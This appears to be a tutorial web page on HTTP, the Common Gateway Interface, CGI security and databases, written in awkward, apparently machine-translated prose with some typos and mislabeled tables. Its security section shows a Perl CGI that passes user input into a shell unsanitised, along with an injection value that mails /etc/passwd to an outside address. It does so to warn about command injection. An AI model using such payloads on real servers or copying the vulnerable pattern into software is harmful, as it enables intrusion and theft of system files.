Last Updated:

Server-side programming | HTTP protocol | CGI | Security  | Databases

Like most acronyms, the Common Gateway Interface (CGI) doesn't say much about the point. Interface with what? Where is this gateway? What kind of commonality are we talking about? To answer these questions, let's go back and take a look at the WWW as a whole.

Topic: Server Side Programming | HTTP Protocol | CGI | Pass Parameters to the server | Security measures | CGI & Database

Tim Berners-Lee, a physicist who worked at CERN, invented the Web in 1990, although the plan dates back to 1988. The idea was to enable the easily and quickly exchange of multimedia data – text, images and sound – over the Internet. The WWW consisted of three main parts: HTML, URL and HTTP. HTML is the formatting language used to represent content on the Web. A URL is an address used to retrieve content in HTML format (or otherwise) from a web server. HTTP is a language that is understandable to a web server and allows clients to request documents from the server.

HTTP protocol.

Work on the HTTP protocol is as follows: the client program establishes a TCP connection to the server (standard port number-80) and issues an HTTP request to it. The server processes this request and issues an HTTP response to the client.

The structure of the HTTP request.

 An HTTP request consists of a request header and a request body, separated by an empty string. The body of the request may be missing. The request header consists of the main (first) query string and subsequent strings that lookup the query in the main line. Subsequent lines may also be missing. The query in the main line consists of three parts, separated by spaces:

1. Method (in other words, HTTP command):

  • GET - document request. The most commonly used method; in HTTP/0.9, it is said to have been the only one.
  • HEAD - request for the title of the document. It differs from GET in that only the request header with information about the document is issued. The document itself is not issued.
  • POST - this method is used to transfer data to CGI scripts. The data itself follows in subsequent query strings as parameters.
  • PUT - place the document on the server. Rarely used. A request with this method has a body in which the document itself is passed.

2. The resource is the path to a specific file on the server that the client wants to retrieve (or host - for the PUT method). If the resource is just any file to read, the server must issue it in the response body for this request. If this is the path to any CGI script, the server runs the script and returns the result of its execution. By the way, thanks to such unification of resources, the client practically does not care what he represents on the server.

3. Protocol Version - the version of the HTTP protocol with which the client program works.

Thus, the simplest HTTP request might look like this:

GET/HTTP/1.0 - requests the root file from the root directory of the web server.

The lines after the main query string have the following format: Parameter: Value.

Therefore, the query parameters are set. This is optional, all rows after the main query string may be missing; in this case, the server accepts their default value or based on the results of the previous request (when working in Keep-Alive mode).

Let's list some of the most common parameters of an HTTP request:

§ Connection - can take the values Keep-Alive and close.

§ Keep-Alive means that after the issuance of this document, the connection to the server is not broken, and more requests can be issued. Most browsers work in the Keep-Alive mode, as it allows you to "download" the html page and drawings to it in one connection to the server. Once installed, Keep-Alive persists until the first error or until explicitly indicated in the next Connection: close request.

§ close - the connection is closed after the request is answered.

§ User-Agent - the value is the "code mark" of the browser, for example: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)

§ Accept - list of content types supported by the browser in order of their preference by this browser, for example, for IE5: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*The value of this parameter is used mainly by CGI scripts to generate a response adapted for this browser.

§ Referer - the URL from which you came to this resource.

§ Host - the name of the host from which the resource is requested. Useful if the server has multiple virtual servers under the same IP address. In this case, the name of the virtual server is determined by this field.

§ Accept-Language - supported language. Matters to a server that can produce the same document in different language versions.

The format of the HTTP response. 

The format of the response is very similar to the format of the request: it also has a header and a body separated by an empty string. The header also consists of a main string and parameter strings, but the format of the main string differs from that in the request header. The main query string consists of 3 fields separated by spaces:

§ Protocol version - similar to the corresponding query parameter.

§ Error code - the code designation for the "success" of the request. Code 200 means "all is normal" (OK).

§ Verbal description of the error - "decryption" of the previous code. For example, for 200 it is OK, for 500 - Internal Server Error.

The most common parameters of the http response are:

§ Connection - similar to the corresponding query parameter. If the server does not support Keep-Alive (there are some), then the Connection value in the response is always close.

§ Content-Type - contains the designation of the content type of the response.

§ Depending on the Content-Type value, the browser perceives the response as an HTML page, a gif or jpeg image, as a file to be saved to disk, or as something else and takes appropriate action. The Content-Type value for the browser is similar to the value of the file extension for Windows.

Some types of content:

̈ text/html - text in HTML format (web page);

̈ text/plain - plain text (similar to "Notepad");

̈ image/jpeg - picture in JPEG format;

̈ image/gif - the same, in GIF format;

̈ application/octet-stream - a stream of "octets" (i.e. just bytes) to write to disk.

§ Content-Length - the length of the response content in bytes.

§ Last-Modified - the date of the last modification of the document.

The ability to send all types of information over the Internet was a revolution, but another possibility was soon discovered. If you can send any text over the Web, why can't you send text created by a program instead of text created from a finished file? This opens up a sea of possibilities. A simple example: you can use a program that displays the current time so that the reader sees the correct time each time the page is viewed. A few smart heads at the National Center for Supercomputing Applications (NCSA) who created a web server saw this opportunity, and soon CGI appeared.

CGI is a set of rules according to which programs on a server can send data to clients through a web server. The CGI specification was accompanied by changes to HTML and HTTP introducing a new feature known as forms.

If CGI allows programs to send data to a client, forms extend that capability by allowing the client to send data to that CGI program. Common CGI applications include:

Dynamic HTML. Entire sites can be generated by a single CGI program.

  • Search engines that find documents with user-defined words.
  • Guestbooks and bulletin boards to which users can add their posts.
  • Order forms.
  • Questionnaires.
  • Retrieving information from a server-hosted database.

All of them provide the ability to connect CGI to the database, which we are particularly interested in.

CGI Specification

So, what exactly is the "rule set" that allows a CGI program in, say, Batavia, Illinois, to exchange data with a web browser in Outer Mongolia? The official CGI specification, along with a wealth of other information about CGI, can be found on the NCSA server at http://hoohoo.ncsa.uiuc.edu/cgi/.

There are four ways that CGI transfers data between a CGI program and a Web server, and therefore a Web client:

  1. Environment variables.
  2. Command prompt.
  3. Standard input device.
  4. Standard output device.

Using these four methods, the server forwards all data transmitted by the client to the CGI program. The CGI program then does its magic trick and sends the output back to the server, which forwards it to the client.

These data are given with an estimate of the Apache HTTP server. Apache is the most common web server, running on almost any platform, including Windows 9x and Windows NT. However, they can be applied to all HTTP servers that support CGI. Some proprietary servers, such as those from Microsoft and Netscape, may have additional features or work somewhat differently. As the face of the Web continues to change at an incredible rate, standards are still evolving, and there will undoubtedly be changes in the future. However, CGI technology seems to be well-established - you have to pay for it by the fact that other technologies, such as applets, have supplanted it. All the CGI programs you write using this information will almost certainly be able to run for years to come on most web servers.

When a CGI program is invoked through a form, the most common interface, the browser passes a long string to the server, at the beginning of which is the path to the CGI program and its name. This is followed by various other data, which are called path information and are transmitted to the CGI program through the environment variable PATH_INFO (Table 2-1). The path information is followed by a "?" followed by the form data that is sent to the server using the HTTP GET method. This data is made available to the CGI program through the QUERY_STRING environment variable. Any data that the page sends using the HTTP POST method, which is used most often, will be transmitted to the CGI program through a standard input device.

A typical string that a server can get from a browser is shown in Table. 3-1. A program named formread in the cgi-bin directory is called by the server with additional information of the extra/information path and the data of the choice=help request - apparently as part of the original URL. Finally, the data of the form itself (the text "CGI programming" in the "keywords" field) is sent through the HTTP POST method.

Table 2-1. Parts of the string passed by the browser to the server

http://www.myserver.com/cgi-bin/formread/extra/information?choice=help
 program namepath informationquery string

Environment variables

When the server executes a CGI program, it first of all transmits some data to it for work in the form of environment variables. Seventeen variables are officially defined in the specification, but significantly more are used informally through the mechanism described below, called HTTP_mechanism. The CGI program has access to these variables in the same way as any command processor environment variables when run from the command line.

In a shell scenario, such as the FOO environment variable can be accessed as $FOO; in Perl, this address looks like $ENV{'FOO'}; in C, getenv("FOO"); Table 2-2 lists the variables that are always set by the server, even if only to null. In addition to these variables, the data returned by the client in the request header is assigned to variables of the form HTTP_FOO, where FOO is the name of the header. For example, most Web browsers include version information in a header named USER_AGENT. Your CGI program can get this data from the HTTP_USER_AGENT variable.

Table 2-2. CGI Environment Variables

Environment variableDescription
CONTENT LENGTHLength of data transmitted by POST or PUT methods, in bytes
CONTENT_TYPEThe MIME type of the data that is attached by using the POST or PUT methods.
GATEWAY_INTERFACEThe version number of the CGI specification supported by the server.
PATH_INFOAdditional path information transmitted by the client. For example, for a request http://www.myserver.com/test.cgi/this/is/a/ path?field=green, the value of the RA variable TH_INFO would be /this/is/a/path.
PATH_TRANSLATEDThe same as PATH_INFO, but the server performs all possible translation, for example, extension of names of the type "~account".
QUERY_STRINGAll data following the "?" character in the URL. This is also the data transmitted when there is a GET REQUEST_METOD form.
REMOTE_ADDRThe IP address of the client making the request.
REMOTE_HOSTThe host name of the client machine, if available.
REMOTE_IDENTIf the web server and client support identd identification, this is the user name of the account that makes the request.
REQUEST_METHODThe method used by the client for the request. For the CGI programs we're going to build, it's usually going to be POST or GET.
SCRIPT_NAMEThe path to the script to run, as specified by the client. It can be used when linking a URL to itself, and so that scripts that exist in different places can be executed differently depending on the location.
SERVER_NAMEHost name - or IP address, if the name is not available, of the machine on which the web server is running.
SERVER_PORTThe port number used by the Web server.
SERVER_PROTOCOLThe protocol used by the client to communicate with the server. In our case, this protocol is almost always HTTP.
SERVER_SOFTWAREInformation about the version of the Web server that is running the CGI program.

Here's an example of a Perl CGI script that outputs all the environment variables set by the server, as well as all the inherited variables set by the shell that started the server.

Code Listing 2.1. Displays the values of environment variables.

print "Content-Type: text/html\n\n

<HTML><HEAD><TITLE></title></head><BODY>\n

<p>Changear environments:<p>\n";

foreach (keys %ENV) {print "$_: $ENV{$_}<br>\n" }

print "</body></html>";

All of these variables can be used and even modified by your CGI program. However, these changes do not affect the Web server that is running the program.

Pass parameters to the server.

Command line. 

CGI allows you to pass arguments to a CGI program as command-line parameters, which is rarely used. It is rarely used because its practical applications are few, and we will not dwell on it in detail. The bottom line is that if the environment variable QUERY_STRING does not contain the symbol " = ", then the CGI program will run with command-line parameters taken from the OUERY_STRING . For example, http://www.myseruer.com/cgi-bin/finger?root will launch finger root on the www.myserver.com.

Command-line parameters are most commonly used with the HTML tag <ISINDEX> . The <ISINDEX> tag denotes a miniform contained in a single tag. When the browser detects the <ISINDEX> tag, the browser displays a window in which the user can enter the query text. When a request is made (the user presses enter), the browser extracts the URL from the <ISINDEX tag> and accesses it, passing the request text as a command line.

The preceding finger can be written so that when called without arguments, it will output an HTML page with the tag <ISINDEX> . After the user enters the address, the finger will perform the same as described.

Standard input device. 

As mentioned above, if the client uses HTTP PUT or POST methods to transmit information, the length and MIME type of this data are placed in variables CONTENT_LENGTH and CONTENT_TYPE, respectively. The transmitted data is sent to the standard input device of the CGI program. The data end sign may not be sent to the program, so it must take the value of the variable CONTENT_LENGTH and read as many bytes as it specifies. This is the main method of passing data from forms, and in our examples we will almost exclusively use only it.

There are numerous libraries for almost all languages that perform important tasks of configuring CGI programs, including determining which method - GET or POST - data is transmitted, and, accordingly, parsing the environment variable QUERY_STRING or read from a standard input device. These libraries then put the data into easily accessible variables. An extensive list of CGI resources for different languages is available at Yahoo at: http://www.yahoo.com/Computers_and_Internet/Internet/ World_Wide_Web/CGI_Common_Gateway_Interface/

Standard output device. 

The data sent by the CGI program to a standard output device is read by the web server and sent to the client. If the script name begins with nph-, the data is sent directly to the client without intervention from the Web server. In this case, the CGI program must generate the correct HTTP header that will be understandable to the client. Otherwise, provide the Web server with an HTTP header.

Even if you do not use an nph script, the server needs to be given one directive that will tell it information about your issue. This is usually the Content-Type HTTP header, but there can also be a Location header. The header must be followed by an empty string, that is, a line feed or a CR/LF combination.

The Content-Type header tells the server what type of data your CGI program is giving. If it is an HTML page, the string must be Content-Type: text/html. The Location header tells the server a different URL or path on the same server where to direct the client. The title should be: Location: http:// www.myserver.com/another/place/.

After the HTTP headers and the empty string, you can send the actual data that your program outputs - an HTML page, an image, text, or anything else. Among the CGI programs that ship with the Apache server are nph-test-cgi and test-cgi, which do a good job of showing the difference between headers in the nph and non-nph styles, respectively.

Important features of CGI scripting. 

You already know basically how CGI works. The client sends the data, usually using a form, to the web server. The server executes the CGI program, passing data to it. The CGI program carries out its processing and returns its output data to the server, which transmits it to the client. Now, from understanding how a CGI program works, you need to move on to understanding why they are so widely used.

There are a few more important questions to be sorted out before you can create programs that actually work. First, you need to learn how to work with several forms. Then you need to master some security measures that will prevent intruders from gaining illegal access to your server's files or destroying them.

State memorization

Mindfulness is a vital means of providing good service to your users, not just serving to combat hardened criminals. The problem is caused by the fact that HTTP is the so-called "no memory" protocol. This means that the client sends data to the server, the server returns the data to the client, and then everyone goes their own way. The server does not store data about the client that may be needed in subsequent operations. Similarly, there is no certainty that the client will save any data about the transaction that can be used later. This imposes a significant restriction on the use of the World Wide Web.

 

Writing CGI scripts with such a protocol is analogous to the inability to remember a conversation. Whenever you talk to someone, no matter how often you've interacted with them before, you have to introduce yourself and look for a common topic of conversation. Figure 3-1 shows that whenever a request reaches a CGI program, it is a completely new instance of the program that has no connection to the previous one.

In part of the client, with the advent of Netscape Navigator, a seemingly hastily made solution called cookies appeared. It consists of creating a new HTTP header that can be sent back and forth between the client and the server, similar to the Content-Type and Location headers. The client browser, having received the cookie header, must save data in the cookie, as well as the name of the domain in which this cookie operates. After that, whenever you visit a URL within the specified domain, the cookie header must be returned to the server for use in CGI programs on that server.

The cookie method is used primarily to store a user ID. You can save the visitor information in a file on the server. The unique ID of this user can be sent as a cookie to the user's browser, after which each time the user visits the site, the browser automatically sends this ID to the server. All this happens imperceptibly for the user.

Despite the usefulness of this method, most large sites do not use it as the only means of remembering the state. There are a number of reasons for this. First, not all browsers support cookies. Until recently, the main browser for people with low vision (not to mention people with insufficient network connection speeds) - Lynx - did not support cookies. "Officially" it still does not support them, although some of its widely available "side branches" do so. Secondly, and more importantly, cookies bind the user to a specific machine. One of the great advantages of the Web is that it is accessible from anywhere in the world. Regardless of where your web page was created or stored, it can be displayed from any Internet-connected machine. However, if you try to access a cookie-enabled site from someone else's machine, all of your personal data maintained by the cookie will be lost.

Many sites still use cookies to personalize user pages, but most complement them with a traditional "login/password" style interface. If the site is accessed from a browser that does not support cookies, the page contains a form in which the user enters the registration name and password assigned to him when he first visited the site. Usually this form is small and modest, so as not to scare off the majority of users who are not interested in any personalization, but simply want to go further. After the user enters the registration name and password into the form, CGI finds a file with data about this user, as if the name were sent with a cookie. Using this method, the user can register on a personalized website from anywhere in the world.

In addition to the tasks of taking into account the preferences of the user and storing information about him for a long time, you can give a more subtle example of remembering the state, which is given by popular search engines. When you search using services like AltaVista or Yahoo, you typically get significantly more results than can be displayed in an easy-to-read view.

This problem is solved by showing a small number of results—typically 10 or 20—and giving a mover to view the next group of results. Although this behavior seems normal and expected to the average Web traveler, its actual implementation is non-trivial and requires remembering the state. When a user first makes a query to a search engine, it collects all the results, perhaps limited to some preset limit.

The trick is to produce these results simultaneously in a small amount, while remembering what kind of user requested these results and what portion he expects next. Leaving aside the complexities of the search engine itself, we face the problem of consistently providing the user with some information on one page.

However, if you need more than the ability to just flip through a file, then relying on a URL can be onerous. You can alleviate this difficulty by using an HTML form and including state data in the <INPUT> tags of the HIDDEN type.

This method is successfully used on many sites, allowing you to make links between interconnected CGI programs or expanding the possibilities of using a single CGI program. Instead of referencing a specific object, such as a start page, these URLs can point to an automatically generated user ID.

This is how AltaVista and other search engines work. At the first search, a user ID is generated, which is hiddenly included in subsequent URLs. Associated with this ID are one or more files that contain the results of the query. Two more values are included in the URL: the current position in the results file and the direction in which you want to move further in it. These three values are all that is needed for the powerful navigation systems of large search engines to work.

Security measures

When operating Internet servers, whether they are HTTP servers or otherwise, compliance with security measures is a paramount concern. The exchange of data between the client and the server, carried out within the framework of CGI, raises a number of important problems related to data protection. The CGI protocol itself is quite secure. A CGI program receives data from the server through a standard input device or environment variables, and both of these methods are secure. But once a CGI program takes control of the data, its actions are unlimited. A poorly written CGI program can allow an attacker to gain access to a server system. Consider the following example of a CGI program:

Code Listing 2.2. A valid CGI interface to the finger command.

#!/usr/bin/perl -w

use CGI;

my $output = new CGI;

my $username = $output->param('username');

print $output->header, $output->start_html('Finger Output'), "<pre>", `finger $username`, "</pre>", $output->end_html;

If you run the program simply as a finger.cgi, it will display a list of all current users on the server. If you run it as finger.cgi?username=fred, it will display information about the user "fred" on the server. You can even run it as a finger. cgi?username=bob@foo.com to display information about the remote user. However, if you run it as finger.cgi?username=fred;mail hacker@bar.com</etc/passwd, unwanted things can happen. The reverse stroke operator "'' " in Perl spawns the wrapper process and executes a command that returns the result. In this program, "finger $username" is used as an easy way to execute the finger command and get its result. However, most shells allow you to combine multiple commands on a single line. For example, any processor like the Bourne processor does so using the ";" character.

Therefore, 'finger fred;mail hacker@bar.com</etc/passwd' will first run the finger command and then the mail hacker@bar.com</etc/passwd command, which can send the entire server password file to the unwanted user.

One solution is to parse the data from the form in order to find malicious content. You can, say, search for the ";" character and remove any characters that follow it. It is possible to make such an attack impossible by using alternative methods.

Another important security consideration is related to user rights. By default, the Web server runs the CGI program as the user who started the server itself. Usually it is a pseudo-user, such as "nobody", who has limited rights, so the CGI program also has few rights. This is usually a good thing, because if an attacker can access the server through a CGI program, he will not be able to cause much harm. An example of a program stealing passwords shows what can be done, but the actual damage to the system is usually limited.

However, working as a limited user also limits the capabilities of CGI. If a CGI program needs to read or write files, it can only do so where it has that permission. A CGI program must have read and write permission to the desired directory, not to mention the files themselves. You can do this by creating a directory as the same user as the server, with read/write permissions for that user only. However, for a user like "nobody", only root has this capability. If you are not a superuser, you will have to communicate with the system administrator every time the CGI changes.

Another way is to make the directory free to read and write, effectively removing all protection from it. Since these files can only be accessed from the outside world through your program, the danger is not as great as it may seem. However, if a hole is found in the program, the remote user will have full access to all files, including the ability to destroy them. In addition, legitimate users working on the server will also be able to modify these files. If you are going to use this method, all users of the server must be trustworthy. Also, use an open directory only for files that are required by a CGI program; in other words, don't put unnecessary files at risk.

What else can you read.« CGI Programming on the World Wide Web" by O'Reilly and Associates covers material from simple scripts in different languages to really amazing tricks and tricks. Publicly available information is also available in abundance in the WWW. It's a good idea to start with CGI Made Really Easy at CGI Easy.

CGI and Databases

Since the beginning of the Internet era, databases have interacted with the development of the World Wide Web. In practice, many view the Web simply as one giant database of multimedia information.

Search engines provide a day-to-day example of the benefits of databases. The search engine doesn't go all over the internet looking for keywords the moment you query them. Instead, site developers use other programs to create a giant pointer that serves as a database from where the search engine retrieves records. Databases store information in a form that allows for fast random-access sampling.

Because of their variability, databases give the Web even more power: they turn it into a potential interface for anything. For example, system administration can be performed remotely through the web interface instead of requiring an administrator to register with the desired system. Connecting databases to the Web is at the heart of a new level of interactivity on the Internet.

One of the reasons for connecting databases to the Web regularly makes itself felt: a significant part of the world's information is already in databases. Databases that existed before the advent of the Web are called legacy databases (as opposed to non-Web-connected databases created recently and which should be called a "bad idea"). Many corporations (and even individuals) are now faced with the task of providing access to these legacy databases via the Web.

As stated above, only your imagination can limit the possibilities of communication between databases and the Web. Currently, there are thousands of unique and useful databases that can be accessed from the Web. The types of databases that operate outside of these applications are very different. Some of them use CGI programs as an interface to a database server such as MySQL or use commercial applications to interact with popular desktop databases such as Microsoft Access. And others simply work with flat text files, which are the simplest databases of all possible.

With these three types of databases, you can develop useful websites of any size and complexity.